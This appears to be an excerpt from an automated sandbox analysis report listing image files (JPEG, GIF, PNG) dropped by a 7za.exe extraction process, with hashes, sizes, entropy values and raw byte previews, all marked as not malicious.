      SHA-512:050C4443B308C8D3B8A58DDB61CFC1165B6A3315FEB767527CD9771718D3D9A66394B4165375493ECE870C7507764C3A542FF30DB3F5AB0FDCF67FE61F065598
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................i...g..0...E..................................................................................................................................................................................................................................... !..@."...0P1A%5.234$........................!1..AQ."234. @aq..R.#....rs50P..Bb...S...$Dc....................`..1A0Pp..!....................!1A.Qaq @.......P..0..........................................................................................................................X...%.v...............)5.Y.!c..UZL.....Z................-s......A..k..F...-....................N3....H...=.E..yh.............:.u.|. ..\..>...{...O;{................-..=....+...;.r.h...3..|.E.y?NB.+......L...f."........S.....}.....8T.Sc..W..;.D.....<....5.+.]6..\.y...=..........G.N.{..6.q...~w..]#^...W..e:(z\4.J-s....".8..,r..-....f.s.......9.....\.\...."MYg.}.~.d.=..K......R.............W.D
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 404x266, components 3
      Category:dropped
      Size (bytes):72012
      Entropy (8bit):6.652853551510732
      Encrypted:false
      SSDEEP:
      MD5:B212860CAECE86369A5FA87A63CFA2FD
      SHA1:47BCE3314F7DB674AD74F31C13A89B895EDF5C1E
      SHA-256:806D250AF7419CEEEC1875AD8A83CA93226A42A57FE5685D389FE66FFA10BEA2
      SHA-512:0C4DB0E6820F5F408EEFE6009C3EE827E516ABEF08D21D6D40324552CC4081983730F8E41AB678E9CD899841A8FF19DF71C0577E2366CC128599F6B7EAB05069
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H.........http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c143 79.161356, 2017/09/07-01:11:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:xmpTPg="http://ns.adobe.com/xap/1.0/t/pg/". xmlns:stDim="http://ns.adobe.com/xap/1.0/sType/Dimensions#". xmlns:xmpG="http://ns.adobe.com/xap/1.0/
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 469 x 250
      Category:dropped
      Size (bytes):445761
      Entropy (8bit):7.911269465857963
      Encrypted:false
      SSDEEP:
      MD5:E5B772F3DAE256DE4F49851ECBA0B184
      SHA1:BD2B3D55758ED96104B56CF2C5BA90595B663A2F
      SHA-256:2728C3CB6D17F2578DC95C9638EA960717DF17F92D0E5C6A09CCF4139AF49236
      SHA-512:7DB71330AAB3A8AFD301AC0C91D431D34DEC83A55A97DA43959A0C0C16C38E455737498987DF0F7E6F09F9BC9AE2242BA460B8365140F76E7D94C3DCABB3438B
      Malicious:false
      Reputation:low
      Preview:GIF89a........{...........tks......cZ]...WUV........ecdjkm...xwy.........................................................HSX...............SJS..................%!...")12)),odV6441)251(vjeYRCO6078D...)1).wo...$!#0)&B9<...GFF......kC9gWK..|AB:...PE4zsi...ue?.WJTIE.........w.........j....~.&DCGU........t.{l...|.z..0............gY....v........E...............]c....................Shu...........{....................DTK....wHv.......'6]ax.C{..Cs.............buy.y|z>..!Z...KWj._c....R-...b|dOi]~..R..........d..|..l...5T.1J.1X$S..)N.!9.!E..<.............J.........a..e.eA....v..&k.......{..........x..t..\.....J...l.1.....t..,v.o..a..S.....O...d............s..q1.....*h.O......]....S..N..A..9j...5.X.LQ.Z^.a[./7.IJ.46.8F.HI.&(..!..).F....o.:.Q.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="ht
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):44787
      Entropy (8bit):7.7978798514586725
      Encrypted:false
      SSDEEP:
      MD5:33F3BCD46241773474DFF953DE5CC0E9
      SHA1:68B8DD1D405641165CEF98A9E6596FD75825C7A8
      SHA-256:561F6016DEE887BC271B186C62F83AAAC96769C273F9FFEB9D41755C1B5460CB
      SHA-512:08AB694D3307D62B5856882DC324E763A91F64EAFE7827B4903A4B50775957091C708CED3CCC084DBC57D3096212F0D3F347EA0DB6B7E87DB06705F8FD294E6B
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):42818
      Entropy (8bit):7.787690131416162
      Encrypted:false
      SSDEEP:
      MD5:1DA4753086623DC924087D82C3AB670D
      SHA1:0D09E8A06550FE8274D361E1DC78A166A5137EF9
      SHA-256:BA9737DAA49AC9D10670F2AAE0714DD235D06658BE0CF8EAC9965B76CA1E3CFA
      SHA-512:83A3EAC482CA031680DF6C61BA71DF27EB7AACC5ECA972527456D5642D32CFC5D5DEE94B8487208D85D8CB8118712F547D78D2ACDE3A8B19484101E37AC79143
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):43388
      Entropy (8bit):7.7817908505154065
      Encrypted:false
      SSDEEP:
      MD5:FD5839BF04ED3B694A9A51A970CCA9F9
      SHA1:229446095AA56C65B6CD7D0A1495BA4E8A30F801
      SHA-256:5A3184E51DB5E2D5D9808F3128896004252E1AD03397769BE556339D469B242B
      SHA-512:7DC5984C2420A0873E06B5A1D26BA73D31B05CA324B6FD9BAA90F0F15291CBC76C19D078E43BE324583DB20645BA4ED8280B83919F82DBEB1EEAFEC0C86851CB
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):44793
      Entropy (8bit):7.787706420500754
      Encrypted:false
      SSDEEP:
      MD5:6BD67EB688D363D635F7E02B9337D70D
      SHA1:EE0265D5C802B26B7189462D7DB7A9ABDA46D733
      SHA-256:DDC07C3B0153A36181249E72BBF8F38A2C740580BB8F2BC1A9D38FC3F361A813
      SHA-512:7A7D47DAB4BE5278319F3B0EEF8030135616A362FD4FC052C56D80464CF0C8FA601AC42456DF88AD65AD31876BFF16186B7C1363EC3A67A6F4426F872C01E18C
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):43858
      Entropy (8bit):7.774614375265354
      Encrypted:false
      SSDEEP:
      MD5:A9361880A8810E2F58DCEAC5515F0992
      SHA1:B64C5859B7D7CB80EDAA12D4DF2DBC3D9F2EE109
      SHA-256:4ED207128C6EE53619CE1D86E1ABA4248DD8E07DE5DF5C5F0C9FD36122250B57
      SHA-512:81C861375C2B4DA26FC6ADBA9FE14E298810C578C8E7143BEC67A6F30A3E68EF91594D3E7F17E56063CA2962CF6C3EC01BBD1263766196FE121D915F011DD13C
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):44866
      Entropy (8bit):7.786584513160295
      Encrypted:false
      SSDEEP:
      MD5:FCCD93066B34E797CDE2633061CE57F0
      SHA1:57FF9AFECA8EFD27EDC1C563AD6D3A8A1810DBCE
      SHA-256:D06B3DE10C0E11FAF22B1EDD6D630273898F018ABE370DB9CAA6FCB3181C0024
      SHA-512:5084DB05EBD0BBAA11A0A4BDAECBF008C154B6F0B78C9D2819E15C9D7F11DD91142E7081B02EB9EA56123AB9B4FD1D4ECE0D8491F83A834A6B11845B962123D2
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):14659
      Entropy (8bit):7.742581193958051
      Encrypted:false
      SSDEEP:
      MD5:692507E049477AEE5E5A76F287F53AB6
      SHA1:490273C2A44EC164BECB6868A1C67697CACB41CF
      SHA-256:8DFD3A775F516B2500ADD31CB3499459A75A7ECB0A37389CCC3224F042EC85C8
      SHA-512:3D48DD885A3C44FAB38D62DC29559B0E98A571742168AD53BB776583935B8869609F9753C7D0DA76619654BC16122AF18E5994A91E7F4A690F1F6C68C2C02708
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................u...5..$9..9A........................................................................................................................................................................................................................................ 0P..@!1.5"#4.pB`A%.....................1..!A..2.. 0Qaq.."..@..r..4P.R.#3p.Bb.D..s...................1Ap@...!....................!1AQ. aq.....0@P....p................................................................................................<.................s.....(..x.I...............c,..o.(.....tvP...K.q.............r@..A.7.... .Y{.5.JU..e-.c..q...<c$.ELX..UI2Fe...K.....7.].c.....1..A%K. ..*AS!R.. ......,..#! ..1...4:.....s... .. .. ..$....H..s1`...NU......>....... .Ab.,T..$...H..@.X..).....' .-.R.....t...$.H..A$..$.@,H..S9p...N?..l..O...cZ~|pH.....y........... .q..E`.},....?7.x..h./mI .c...?C%..Ad..%..E....\.....o:+...e......4<... .. ..t/O...P......yL....a
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):12292
      Entropy (8bit):7.793404596571088
      Encrypted:false
      SSDEEP:
      MD5:35F4EA82BE07C7B4DD5C004A26A59FDD
      SHA1:1B8D8873AED22E13F3C84A0C6E9169BA02CCF6AF
      SHA-256:F06B3E5B3677335E1BE52ED137EE9A6218E8B9ED368EFF4D5E475DE4BB453C25
      SHA-512:C925BDDA8C9787A654F80B14308AF853D931F39EFEB37F0957881884C5EF203BC6845B1AA460BA06AC42097516F697D7153FDB043A56045B7AA4BBC3F5CF18F4
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................w..!...0.......................................................................................................................................................................................................................................... @P.0345!2p`1#..$%E......................1..3!...4.@.AQq...."2r.s0PaR.5 B..#.p..CS......................................!1Q.Aa @.q...0P....p...................................................................................4....dX.....................k+................s{..5K.....q.G...^............_f.a."...W.K.i.2X.Wj.q.......).................E.$...e.e..[....j....F.r.1s....>.M.z............S..J....@...-...M...%....7 ........./...>..^.N}`.C..cT[.l.`Y]...n...yz.....l.c..s.:U.................l{....:.h...E.0..&u..=1w......7 ...........j....L.?.[g.yoE....n...l.S:..B./sr.........{R......y..c..n..7,.d.,.@[f.O.3.T...s}#....gT.y^..............Tj..S.....`...2...._..X..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):27063
      Entropy (8bit):7.743818917454872
      Encrypted:false
      SSDEEP:
      MD5:3DDB8C9D5BE957B2C2BBC97D05C04151
      SHA1:065D82D99864EFA7D6DB0F66FB46A63A50F8D686
      SHA-256:384C1CD35A09C654BB6F1DC7A68457D962C93CE92CDC2B8801D2FDB2420EE79C
      SHA-512:2B89BB50B0A069749705F438D3C3A31FE4FEE348F7A2F4CFD54C9AB60BF7672A9AF9A86D8FB36BF3F3E3DF9D26A720D884445DF2DF38A0BA970EBDE9BC6A53E0
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):7021
      Entropy (8bit):7.441165049663238
      Encrypted:false
      SSDEEP:
      MD5:71086F133F6B697935BC6C26B2EA8604
      SHA1:49B7ABA18ACF259E5854CF2F7972BCC6A492E003
      SHA-256:BBEFD054A6616D96EEBFFC01EFD72543753367B46882A72148C80B181619C74D
      SHA-512:B0EB71C64FB78631CD199B712A82DA9B14F782779A87EDC8EF544E734A80DF6AE8C918CCF3DA9CF06D06C60524A2787109CE402F0ECEC9C853A4A361C80DB222
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................-...6...k................................................................................................................................................................................................................................. ....P.1.0@.45....23!"....................... !1..rPQq..3@A2B....s40a..."R......b.#......................................!1. 0P.AQaq..@.......`......................................................................................................................z.....z..O..................nL......o>.F-...............z......:^.{^;.............M.Pz......H.q:.............&.(=y.....O/|...1j.N...............J.^l.z.`w....+.....M.>=^..9.....1j.N...............J.^a.qk..w...T.......$.F/Nq.1j.N...............J.^a..}/..^......=...i.'..1j.N...............J.^`-......y..}r:F-[...............7iA......)ca..5<-..x=s.w../r..O.....?..............0.e..o=j..mg.I.x..d...~.....tPG......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 61 x 75, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):411
      Entropy (8bit):7.093690940248408
      Encrypted:false
      SSDEEP:
      MD5:7B485DA8D850C57802398E87C26C2B52
      SHA1:B1FEB609441B3B1E5A978893B39FED004FE5E9A3
      SHA-256:656B49FFD6817FAC623E1C45E93730C54DBB73AF342D2CE20FC971F0D98BD352
      SHA-512:C663928D177FD38078A9AF1DE5AFABCE7B8A89073A1B382BECA3C5E1862919CEF9253C16E39DB2C9B0CC432EE40904936FAE16E7FD5F3B1D09BF5F6E1A167F45
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...=...K........5....pHYs...%...%.IR$....MIDATx....M.@...?..A.@6..........t..@..n@7`...&...L.....II{.?...P....W...E..-Zt.q...[.[..*`....@?........w..m..L..L...p..{....]x5..x.n"..g........m.....:W.6bE.....0|..#..._.y.[b...m..y`.c..y{#.z...].z...'BH4.E....}.2.:.T...h&.......N..x..../j..=D..]D..6.fz=q.X.....I)..j.h...h.E..-Z.h.E..-Z.h.E..-Z..\...6..v.......TR..Q.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 61 x 75, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):762
      Entropy (8bit):7.541094813922128
      Encrypted:false
      SSDEEP:
      MD5:371FB645A3289136B106CDF7B086EF25
      SHA1:B37BBD8D173644D276A880D32FB9605608F46CB4
      SHA-256:7AC9159467576EA038D7537FE5B5C70B551C639863706B0960B89F5495630F00
      SHA-512:36924B16C8FFA7E019722AE490A2521E2DC7415AD56CB6C5B245532C3AE07E99778B855E528AE84BE80E8E72A12467082D62FFE230C7B76CA3A345BC5D334ECA
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...=...K........5....pHYs...%...%.IR$.....IDATx....0...i........V.w......o......;....@.`..]...i$...9G/6.|..h4bED.7.p............................}..-....@#..(......1.8......(.A.l....Y..EMY.`gq]..gn..!"...l....d.....J..U{..{.G......4.g&.....5..C......r.....+...zC.NY..8....].1(.t.>.&.~...*....,j/...c..C.,q.K...'....R..&9i.j.g.N.*...W..e.<..m.uU.<...,7...NfJg3A..Jr.......W!|QF.-Y...7..r.....r..<...9....8..[.-..--s..]......,.O.....@:....eX..nK.......|a..VN$K.-..VNl..D.wo."B.`.K..w..y.\..Y.44.k.vZ8.6.n....7.|.KaW..bSa.h....[..%.I..5.....~..`_o..V..>.V.S'.,.|.......tW.....9...k...8.Y.S.q...Y7..:.3<..f...'.n....,.%..H.P..E....7.....p..v...Q.Q.RDX.%x?..m..aL?.Ph.Vh.Vh.Vh.Vh.Vh.Vh.Vh.V.{...=..`.?[.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 314 x 203, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5015
      Entropy (8bit):7.906334621630845
      Encrypted:false
      SSDEEP:
      MD5:01D30C8DD367EE3DE8C0C2C02ABE7DAC
      SHA1:BF72AC215F4AEC4679AE1DE544225FEF9E5633C4
      SHA-256:1177740BC48F761A135E9C64309C381CD7A21687A48B9AC2C84578AE9EB1D3DB
      SHA-512:B88E87424820BF3ACA9E8D9110E2BAB573C55416B2CBAF13C1FFBD6ADFC1505738A270D8294E5A50E006228D72556F4E88C90F6A5AC2513C15BB5EBB30D3B85A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...:..........._T....pHYs...........~....IIDATx..._lTWb...w..;3...q......`.&N.M.$..+.T.....DUSA@..nY...h.P....@.....V..!..8jH.bWj..c).l...3..s..a......3.;......;.....9.?..8..jfR...:. .....P...m+)......"..v{.qJ....../.no{.. .....@..@..P.@u.<.m.t...R?A...Bn..<. ......5.@..5.r..^...P..2..Q.{.|.!.F]..^...4.......@!G.m...:..Bp....MW...$..:...r.`...~.%.Tz`.q.c*....t.....*.k..n..5HZ/i...U.|.......2...I/s.P..I.Y.{.L.......xI.-.pU.e...IK..Qc..6.....t.\...\.G...'.P.^...v ....#.h.Vh...,..5..|..2s_..tuQ..no[&...q@....b...... Iz6..*..'.T....Au....t.@.. .......b...1.!...dD"2#+.`(...UJ..F%I..u9.A...+.w.......7k]....2.G..0.L..$...t..].}.Gv.... .*(....l.&kmgq...e...C.XL...ew.......".GWd..c...N..rS.3,O.6...).}....t.Pp......7.....w..{.5..~>..]...[..w.....B...........R...#O..y.@P.C....t..r..2.`e..@..r.8....A7g<.6Ud..w.p3.. .,...y.W...|...E......X..g.&..@...S.*.i.u.c...n.5.`H.w..d.Ayv....]....Q...sR..V.L....5._t_S{]...'.S..7.D...'>$'.....0.:
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):8038
      Entropy (8bit):7.519634807778062
      Encrypted:false
      SSDEEP:
      MD5:788CE4184BE4AABDEB49D7B799B117B6
      SHA1:E175D462950993A6A7EF82C51E71D1F0556E5832
      SHA-256:9D14BD61F86572D62F5CFB87E81E8AA708B3D8631DF4FEFEFB68753732EB2831
      SHA-512:2B8396526CC5DF33763914BE3EC3B86B46A3859334DD7C92851172DEB7753655E28779749D72B20DE17E586E87B4AC99F3254C1A0F2E8161B5FCBECF6FFB9474
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................e...........d........................................................................................................................................................................................................................................!1."2@.4.. 0P#$.5%......................!1...Aq"Qa....Br. @..2Rs....#C40P.3........................! 1@a.q0P.....................!1A.Qaq..... @...0P....................................................................................................................................................................................................................p..4.._.06.I....................|.._...Z...[...?_W..Q.%..S-.;...l/%...@.J...~.=...D.:.....f.i....@........?7.O....[...?_W..f...jr.Aa..}.....=..?.~h..5t5.....*..v;[OE-R..h.gY.......0................;|H..\.Uv...../d.....b...........L...y%T.H...7...z3.Cy-^....J.G.....9..;]............]<hb.=l`o..}_?.>{..k...Zf.....Vz
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 592 x 96, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):8337
      Entropy (8bit):7.948892037005618
      Encrypted:false
      SSDEEP:
      MD5:D58A0F9461F9E2DF9DB62728011CE075
      SHA1:9CD8EA2B3A5F031C988C1236EB9907AE140C8534
      SHA-256:10C4B9682EA310E4BE922D2C244DF7C7971904FEBFD47B65862F7702D2BFEDFC
      SHA-512:8E04D6DD180420597B4DA302972523C14C1035145417FDE2266684C21FA555B5D4882C5AAE3194F9D6AF69765EB029562F1D6BD6800C9417D4F694D7909122DB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...`.....]e.....tEXtSoftware.Adobe ImageReadyq.e<.. 3IDATx..{...u.{fvf...@.'..E6.)H..R^H..$.....c.!...Tl#.*..W..\%*.D9....e..kc$..%......TI...l@.`.......z.u.;.KwOO..vvu~ZZ==..{.......*...(..(3..V..(....(..(*x..(....(..(*x..(....(..(*x..(....(..(*x..(....(....)..(....(....)..(....(....)..(....(....)..(....(....(..(*x..(....(..(.&..K..pvp....p.......'@..=.lnim..J5O..n.u...g..=..2.j....G.[...O...(*x.$..w......#r......U.3..bY.\....g....R..s..F.~....>...48.yQ......._.......%...x".w._.s..p.t(..o.y./.z.8,../.......7.Q.T..:..B.........].,E...AOO.c.=.....s...G~...WN....?.p...ws\p.#D<.._!-....;.v.....0H...."0.....!%.G...sEQT...H._.9q.h....c1..t..94%...hv.R)|J45.x.....9...kG_z....r.....}..........vwwC`.2..@...M.6a..Pz.c..?#..c...t.b.9A.u....v.5+W..tIU`...o.K..L.9g..SR.....28..bon.C.w......?.e.b..E.sm8W.1...t{G...........q...m.tKKk2.t4.5....l.....<p..?v..@..-."-..P5....Z.0.m..'...N@.(!b2.+....rG.(<.T....)38..c...bFh.|... 9..Q5...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 18, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):246
      Entropy (8bit):6.662515630656052
      Encrypted:false
      SSDEEP:
      MD5:0F10C08D33F550758DC77A5F42D0A669
      SHA1:15455C14BF31A95688D524BF95F3E86A1D2E0F3D
      SHA-256:BCE3C4DD7EA4ED2DF466B6F43D91A5C8293A564E68A348E916B4A05D25117692
      SHA-512:333DCEE70B85A749BDC8F5B22006B5A943BDA58EABE5997CD07EED36481225835B8B8AD2DAACBFAF273F546A9191F838B79BB0CB3DD4FF7C9FD2D2B463421D3B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............A.......pHYs...%...%.IR$.....IDAT8....0.....b...1@..A..(^`~vb.5Y..f...i....T.0(.............h...]]..D...$...u.=....vp.....m.C@;Yu..Y...n...Y.O.9...C.}v1..[../ u...w..+._zhqH.>W..\w.rp....K+u.R.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):285
      Entropy (8bit):6.7575770395914425
      Encrypted:false
      SSDEEP:
      MD5:35B9D77D1C90B3FAFC40960E4D34B198
      SHA1:38BE5B5F51F9F5FD62495A1258A0119E44353645
      SHA-256:06470A63045F3941BCCF67BCAC4F49DE2F4F1BD12727F07789422483C08F236D
      SHA-512:B41CEE536569A440131C60BB1AD55EE5D44F5DF4F0F705AD6C21B7CFE588D81DE120D01CC0C042CA1096C122F37826E06C46E8A5AA7FAEA2BA7767AE42F97F6C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`.v`.......ad1&4...y .@..@j?.#[.......X.d...;..../.b... ......&.H...$.....\..:..D./ ..../.o .p......+.c8Q..(.%S..&2...|.DF$.....&..4... .pb..G2I...P..,.p.....b8.K@.............{.Y.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):285
      Entropy (8bit):6.726573564331181
      Encrypted:false
      SSDEEP:
      MD5:70985B35B080EBB36885BAAB4D8D3936
      SHA1:41888A2DE86E74E2D68AF6FEBF611D5CB57FD565
      SHA-256:068F98500CD0E2CBBE0CB8E2604F016DDA03387CFA5AF1F45C9C7E6AF8AA6D04
      SHA-512:F9061685B61AA3FDBAF36A3C19C574EEB2C2AB8C890A0A6FDF80AB947E15469F3E18D1068446747C208A449D35C7DC2D660A5309E7D12EFEF3D3D944E657F26A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`.v..3.....ad1&4...y .@..@j?.#[.......X.d...;..../.b... .hbb..&.H...$.....\..:..D./ ..../.o .p......+.c8Q..(.%S..&2...|.DF$.....&..4... .pb..G2I...P..,.p.....b8.K@.........*...........IEND.B`.
